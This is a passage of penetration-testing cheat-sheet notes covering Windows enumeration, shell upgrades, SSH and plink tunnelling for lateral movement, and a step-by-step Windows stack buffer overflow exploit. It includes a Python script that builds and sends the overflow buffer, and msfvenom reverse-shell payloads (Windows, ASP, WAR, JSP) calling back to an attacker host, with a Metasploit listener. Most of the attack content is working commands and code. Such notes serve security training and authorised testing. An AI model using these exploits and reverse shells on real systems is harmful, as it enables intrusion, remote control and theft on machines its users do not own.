netsh firewall show state
netsh firewall show config
netsh dump
(6) PowerShell tools
Empire
https://github.com/EmpireProject/Empire
PowerSploit
https://github.com/PowerShellMafia/PowerSploit
3. Linux
Upgrade to a TTY shell
python -c 'import pty; pty.spawn("/bin/sh")'
os.system('/bin/bash')   (from inside a Python interpreter, after import os)
/bin/bash -i
/bin/sh -i
perl -e 'exec "/bin/sh";'
V. Lateral Movement
1. Local port forwarding
Expose a remote host's port on a local port, via the SSH gateway
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
2. Remote port forwarding
Expose a port reachable from the SSH client on the SSH server side
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Windows: forward the compromised host's local port 445 to port 444 on Kali
First start sshd on Kali
service ssh start
Download plink.exe to the target and run
plink.exe -l root x.x.x.x -R 444:127.0.0.1:445
3. Dynamic port forwarding
-D makes SSH act as a SOCKS (4/5) proxy on the local port: applications (directly or through proxychains) send their traffic into the tunnel and the SSH server connects onward. Unlike local forwarding, a single -D tunnel carries connections to any destination host and port rather than one fixed target.
ssh -D <local proxy port> -p <remote port> <target>
VI. Buffer Overflows
1. Basics
The x86 architecture has 8 general-purpose 32-bit registers that hold data or addresses pointing elsewhere in memory
EBP (base pointer)
ESP (stack pointer)
EAX (accumulator)
EBX (base)
ECX (counter)
EDX (data)
EDI (destination index)
ESI (source index)
EIP: extended instruction pointer; it cannot be written directly and holds the address of the next instruction to execute (it tells the CPU what to do next), so controlling it is the goal of the overflow
ESP: extended stack pointer; points to the top of the stack, which is the lowest address in use because the stack grows downward
EBP: extended base pointer; points to the base of the current stack frame, a higher address than ESP
2. Bad characters
0x00 NULL (\0)
0x09 Tab (\t)
0x0a Line Feed (\n)
0x0c Form Feed (\f)
0x0d Carriage Return (\r)
0xff (also seen as a bad character in some targets; always confirm by comparing the memory dump against the bytes sent)
Generate the bad-character list in bash
for i in {1..255}; do printf "\\\x%02x" $i; done; echo -e "\r"
Generate the bad-character list in Python
''.join("\\x{:02x}".format(i) for i in range(1,256))
3. Windows
General steps
(1) Fuzz until the application crashes and note that EIP is overwritten with A's (0x41).
(2) Generate a unique pattern with pattern_create.rb and send it to the target
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
(3) Note the 4 bytes that overwrite EIP (in hex)
(4) Calculate the offset of those 4 bytes with pattern_offset.rb
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
(5) Send a new buffer to confirm control of EIP: it should now read 42424242 (the B's). Add it to the exploit and note the resulting values of ESP and EIP
buffer = "A" * 2606 + "B" * 4 + "C" * 90
(6) Check how much space is available after EIP (grow the buffer from 2700 to 3500 bytes and see whether the C's still land intact): run morespace.py, right-click ESP -> Follow in Dump, and check the C's
buffer = "A" * 2606 + "B" * 4 + "C" * (3500 - 2606 - 4)
(7) Check for bad characters (0x00 to 0xff): put the whole list in the buffer, right-click ESP -> Follow in Dump, and note where the dump is truncated or differs from what was sent; remove that byte and repeat until the entire list survives
(8) If we cannot jump straight into our buffer, we need a reliable address in memory holding an instruction such as JMP ESP: jumping there lands execution at whatever ESP points to, an indirect but stable way to reach our shellcode. mona.py lists the modules whose addresses could serve as return addresses (the module must not have DEP/ASLR protections, and its address range must not contain bad characters)
!mona modules
Check which memory protections apply (Rebase, SafeSEH, ASLR, NXCompat) and note a DLL that has all of them set to False (right-hand columns).
(9) Get the opcode for JMP ESP
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
The result is "\xff\xe4"
(10) Use mona to find JMP ESP addresses in the DLL chosen in step 8; pick one that contains no bad characters
!mona find -s "\xff\xe4" -m <dllname>.dll
(11) Pause the debugger and follow the address (black arrow pointing right: "Go to address in Disassembler"); confirm that the instruction there is JMP ESP (upper-left pane)
(12) Set a breakpoint to check that we reach the JMP ESP
Upper-left pane -> right-click -> Go to -> Expression
Upper-left pane -> right-click -> Breakpoint -> Toggle (F2)
Add the address to the PoC (the address found in step 10, written little-endian, so 0x5f4a358f becomes "\x8f\x35\x4a\x5f")
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
Run the PoC and check that the breakpoint is hit (message at the bottom of the debugger).
(13) Generate the reverse shell, encoded to avoid the bad characters found in step 7
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
(14) Add the shellcode to the script, with a NOP sled in front because the encoder's decoder stub needs some scratch space on the stack
buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
Add more NOPs if needed
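Added example, not part of the original notes: pure-Python equivalents of the helpers the bad-character section and steps 2 to 14 above rely on, so the whole procedure can be scripted without Metasploit: the cyclic pattern (pattern_create / pattern_offset), the bad-character string, and assembly of the final buffer. Offset 2606, the EIP value 39694438, the return address "\x8f\x35\x4a\x5f" and the 2700/3500-byte sizes are the ones quoted in the steps; the shellcode is a placeholder, and the host, port and bare-TCP protocol in send_buffer are assumptions.

```python
"""Added example (not part of the original notes): pattern_create/pattern_offset,
bad-character string and buffer assembly for the steps above."""
import socket
import string
import struct

_MAX_PATTERN = 26 * 26 * 10 * 3  # 20280 bytes, after which the pattern repeats


def pattern_create(length):
    """Same sequence pattern_create.rb emits: Aa0Aa1Aa2...Aa9Ab0..."""
    if length > _MAX_PATTERN:
        raise ValueError("a pattern longer than %d bytes is not unique" % _MAX_PATTERN)
    chunks = (u + l + d
              for u in string.ascii_uppercase
              for l in string.ascii_lowercase
              for d in string.digits)
    return "".join(chunks)[:length]


def pattern_offset(eip_hex, length):
    """eip_hex is the crash value as the debugger shows it (e.g. '39694438').
    x86 is little-endian, so those four bytes sit reversed in the pattern."""
    needle = bytes.fromhex(eip_hex)[::-1].decode("ascii")
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("%s not found in a %d-byte pattern" % (eip_hex, length))
    return idx


def badchars(exclude=(0x00,)):
    """Every byte 0x01..0xff minus the ones already known to be mangled."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def badchars_py(exclude=(0x00,)):
    """The same bytes as the '\\x..' text that gets pasted into the exploit script."""
    return "".join("\\x%02x" % b for b in badchars(exclude))


def build_buffer(offset, ret_addr, shellcode, nops=8, total=2700):
    """offset bytes of padding, the JMP ESP address packed little-endian, a NOP sled,
    the shellcode, then C filler so the overall length stays constant."""
    eip = struct.pack("<I", ret_addr)
    buf = b"A" * offset + eip + b"\x90" * nops + shellcode
    if len(buf) > total:
        raise ValueError("payload needs %d bytes, only %d available" % (len(buf), total))
    return buf + b"C" * (total - len(buf))


def send_buffer(buf, host="x.x.x.x", port=9999):
    """Deliver the buffer to the target service. Host, port and the bare-TCP protocol
    are assumptions; prepend whatever command prefix the real service expects."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(buf + b"\r\n")


if __name__ == "__main__":
    print(pattern_offset("39694438", 2700))  # 2606, the offset used in step 5
    print(badchars_py((0x00, 0x0a, 0x0d))[:24])
    poc = build_buffer(2606, 0x5f4a358f, b"\xcc" * 351, total=3500)
    print(len(poc), poc[2606:2610].hex())
```

The `pattern_offset` helper reverses the bytes before searching because the debugger displays EIP as a number (0x39694438) while the pattern bytes were written into memory in order ("8Di9"); forgetting that reversal is the usual reason the offset "cannot be found".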
Worked examples (links)
FuzzySecurity | ExploitDev: Part 2
Exploiting Simple Buffer Overflows on Win32
GitHub - justinsteven/dostackbufferoverflowgood
buffer-overflow/win-buff-overflow at master · SiowCY/buffer-overflow · GitHub
VII. Miscellaneous
1. Reverse shells shipped with Kali
/usr/share/webshells/php/php-reverse-shell.php
/usr/share/webshells/php/simple-backdoor.php
2. Msfvenom
(1) List all payloads
msfvenom -l payloads
(2) Listener (set the handler's payload to match the one given to msfvenom)
msfconsole
use exploit/multi/handler
set lhost x.x.x.x
set lport 4444
exploit
(3) Windows
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 EXITFUNC=thread -b "\x00" -f python -v shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f asp > shell.asp
(4) Java (JSP/WAR for Tomcat and similar; the payload is platform-independent)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f war > shell.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > shell.jsp
3. Linux tips
(1) vi
Remove the first 5 characters of every line
:%s/^.\{5}//
Remove the last 5 characters of every line
:%s/.\{5}$//
(2) AWK
Remove duplicate lines (keeps the first occurrence, preserves order)
awk '!seen[$0]++' file